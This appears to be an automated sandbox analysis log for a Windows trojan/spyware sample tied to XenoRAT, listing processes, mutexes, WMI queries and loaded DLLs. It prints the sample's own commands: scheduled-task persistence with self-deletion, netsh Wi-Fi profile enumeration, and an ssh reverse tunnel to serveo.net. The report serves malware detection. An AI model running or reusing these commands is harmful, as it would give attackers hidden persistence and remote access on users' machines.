                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

Source: 0LpFv1haTA.exe, eK83r.cs | Long String: Length: 10266
Source: 0LpFv1haTA.exe.0.dr, eK83r.cs | Long String: Length: 10266
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Code function: 0_2_00007FF848F0325A
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Code function: 0_2_00007FF848F02E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 7_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 7_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F2928A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F2A6E2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F238AE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 13_2_00007FF848F28B0D
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 40_2_00007FF848F22E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 40_2_00007FF848F2325A
Source: C:\Users\user\AppData\Roaming\manager.exe | Code function: 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03223768
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03224350
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03224B80
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03222138
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 42_2_03223759
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Code function: 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 46_2_00007FF848F32E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 46_2_00007FF848F331C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 47_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 47_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 48_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Code function: 48_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Source: 0LpFv1haTA.exe, 00000000.00000000.2093729342.0000019457B52000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe | Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe.0.dr | Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: manager.exe.7.dr, Encryption.cs | Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.41.dr, Encryption.cs | Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.7.dr, Handler.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe.0.dr, ub.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe.0.dr, ub.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: manager.exe.41.dr, Handler.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe, ub.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe, ub.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@68/17@3/11
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | File created: C:\Users\user\AppData\Local\Starlabs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Mutant created: \Sessions\1\BaseNamedObjects\m1ddre3jjw
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Mutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File created: C:\Users\user\AppData\Local\Temp\K-Journals
Source: 0LpFv1haTA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0LpFv1haTA.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCA000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DB8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A2B6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0LpFv1haTA.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | File read: C:\Users\user\Desktop\0LpFv1haTA.exe
Source: unknown | Process created: C:\Users\user\Desktop\0LpFv1haTA.exe "C:\Users\user\Desktop\0LpFv1haTA.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: unknown | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Source: unknown | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Users\user\AppData\Roaming\manager.exe | Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe C:\Users\user\AppData\Roaming\XenoManager\manager.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe | Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: iertutil.dll
